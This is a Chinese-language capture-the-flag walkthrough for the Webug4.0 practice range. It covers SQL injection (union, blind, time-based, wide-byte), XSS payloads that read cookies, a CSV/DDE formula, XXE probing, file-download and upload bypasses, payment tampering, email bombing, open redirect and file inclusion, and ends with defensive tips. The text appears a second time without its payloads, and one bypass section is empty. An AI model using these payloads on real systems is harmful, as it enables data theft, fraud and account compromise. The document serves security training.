Webug4.0靶场通关
字数 1021 2025-08-24 16:48:16

Webug4.0靶场通关全面教学指南

1. SQL注入攻击技术详解

1.1 显错注入

注入点识别:

  • 目标URL: control/sqlinject/manifest_error.php?id=1
  • 判断注入类型:
    • 输入and 1=1and 1=2都正常 → 非数字型
    • 输入单引号'页面变化 → 字符型
    • 输入' -- q注释后正常 → 确认字符型

攻击步骤:

  1. 判断字段数: 
    ' order by 3-- q  # 错误
' order by 2-- q  # 正常 → 字段数为2
  2. 查找回显点: 
    ' union select 1,2 -- q
  3. 查询数据库信息: 
    ' union select 1,database() -- q  # 当前数据库
' union select 1,group_concat(schema_name) from information_schema.schemata -- q  # 所有数据库
  4. 查询特定表: 
    ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' -- q
  5. 获取flag: 
    ' union select 1,group_concat(flag) from flag-- q

1.2 布尔盲注

攻击原理:

  • 通过页面返回的真假状态推断信息

攻击步骤:

  1. 判断数据库长度: 
    id=1' and length(database())=5--+
  2. 爆破数据库名: 
    id=1' and ascii(substr(database(),1,1))=119 --+
  3. 判断表数量: 
    id=1' and (select count(*) from information_schema.tables where table_schema=database())=7--+
  4. 爆破表名: 
    id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101--+

1.3 延时注入

攻击特点:

  • 通过响应时间判断条件真假

攻击模式:

1' and if(条件,sleep(3),1)--+

示例:

1' and if(length(database())=5,sleep(3),1)--+
1' and if(ascii(substr(database(),1,1))=119,sleep(3),1)--+

1.4 POST注入

识别方法:

  • 搜索框输入1'出现报错
  • 确认注入: 
    1' or sleep(3)--+  # 出现延迟

1.5 宽字节注入

绕过技巧:

  • 利用GBK等宽字符集特性
  • 构造payload: 
    id=1%df%27--+
id=1%df%27 order by 2--+
id=1%df%27 and 1=2 union select 1,2--+

2. XXE注入攻击

攻击步骤:

  1. 测试XML解析: 
    <?xml version="1.0"?>
<helo>
  <batch id="test">
    <title>xxe</title>
    <test>xxe test</test>
  </batch>
</helo>
  2. 确认可解析后构造恶意XML

3. CSV注入攻击

攻击原理:

  • Excel自动执行公式
  • DDE(动态数据交换)机制滥用

payload示例:

=cmd|' /C calc'!A0

4. XSS攻击技术

4.1 反射型XSS

id=1<script>alert(document.cookie)</script>

4.2 存储型XSS

  • 在留言框输入: 
    <script>alert(document.cookie)</script>

4.3 DOM型XSS

"required=" "><script>alert(document.cookie)</script><name="

4.4 过滤绕过

  • 当script被过滤时:

5. 链接注入

id=<a href="http://baidu.com">baidu</a>

6. 文件相关漏洞

6.1 任意文件下载

  • 修改参数: 
    file=template/assets/img/1.txt
file=index.php

6.2 MySQL配置文件下载

file=../mysql/
file=../mysql/my.ini

6.3 文件上传绕过

前端拦截绕过:

  1. 修改php文件后缀为png
  2. Burp抓包改回.php

畸形文件绕过:

  • 命名如phpinfo.pphphp

7. 支付漏洞

  • 拦截购买请求
  • 修改金额参数: 
    100 → 0.01

8. 邮箱轰炸

  1. 输入邮箱注册
  2. Burp抓包
  3. Intruder模块设置Null payload
  4. 设置发送次数(如20次)

9. URL跳转

url=https://www.baidu.com
url=https://www.bilibili.com

10. 文件包含漏洞

filename=../../control/upload_file/upload_file_3.php

防御建议

  1. SQL注入防御:

    • 使用预编译语句
    • 严格参数化查询
    • 最小权限原则

  2. XSS防御:

    • 输入输出过滤
    • CSP策略
    • HttpOnly标志

  3. 文件安全:

    • 限制上传文件类型
    • 文件内容检查
    • 存储隔离

  4. 其他:

    • XXE禁用外部实体
    • 支付金额服务器端校验
    • 验证URL跳转目标

本教学文档涵盖了Webug4.0靶场中所有关键漏洞的利用方法和原理,按照实际攻击流程组织内容,可作为渗透测试学习和实践的参考指南。

Webug4.0靶场通关全面教学指南 1. SQL注入攻击技术详解 1.1 显错注入 注入点识别 : 目标URL: control/sqlinject/manifest_error.php?id=1 判断注入类型: 输入 and 1=1 和 and 1=2 都正常 → 非数字型 输入单引号 ' 页面变化 → 字符型 输入 ' -- q 注释后正常 → 确认字符型 攻击步骤 : 判断字段数: 查找回显点: 查询数据库信息: 查询特定表: 获取flag: 1.2 布尔盲注 攻击原理 : 通过页面返回的真假状态推断信息 攻击步骤 : 判断数据库长度: 爆破数据库名: 判断表数量: 爆破表名: 1.3 延时注入 攻击特点 : 通过响应时间判断条件真假 攻击模式 : 示例 : 1.4 POST注入 识别方法 : 搜索框输入 1' 出现报错 确认注入: 1.5 宽字节注入 绕过技巧 : 利用GBK等宽字符集特性 构造payload: 2. XXE注入攻击 攻击步骤 : 测试XML解析: 确认可解析后构造恶意XML 3. CSV注入攻击 攻击原理 : Excel自动执行公式 DDE(动态数据交换)机制滥用 payload示例 : 4. XSS攻击技术 4.1 反射型XSS 4.2 存储型XSS 在留言框输入: 4.3 DOM型XSS 4.4 过滤绕过 当script被过滤时: 5. 链接注入 6. 文件相关漏洞 6.1 任意文件下载 修改参数: 6.2 MySQL配置文件下载 6.3 文件上传绕过 前端拦截绕过 : 修改php文件后缀为png Burp抓包改回.php 畸形文件绕过 : 命名如 phpinfo.pphphp 7. 支付漏洞 拦截购买请求 修改金额参数: 8. 邮箱轰炸 输入邮箱注册 Burp抓包 Intruder模块设置Null payload 设置发送次数(如20次) 9. URL跳转 10. 文件包含漏洞 防御建议 SQL注入防御 : 使用预编译语句 严格参数化查询 最小权限原则 XSS防御 : 输入输出过滤 CSP策略 HttpOnly标志 文件安全 : 限制上传文件类型 文件内容检查 存储隔离 其他 : XXE禁用外部实体 支付金额服务器端校验 验证URL跳转目标 本教学文档涵盖了Webug4.0靶场中所有关键漏洞的利用方法和原理,按照实际攻击流程组织内容,可作为渗透测试学习和实践的参考指南。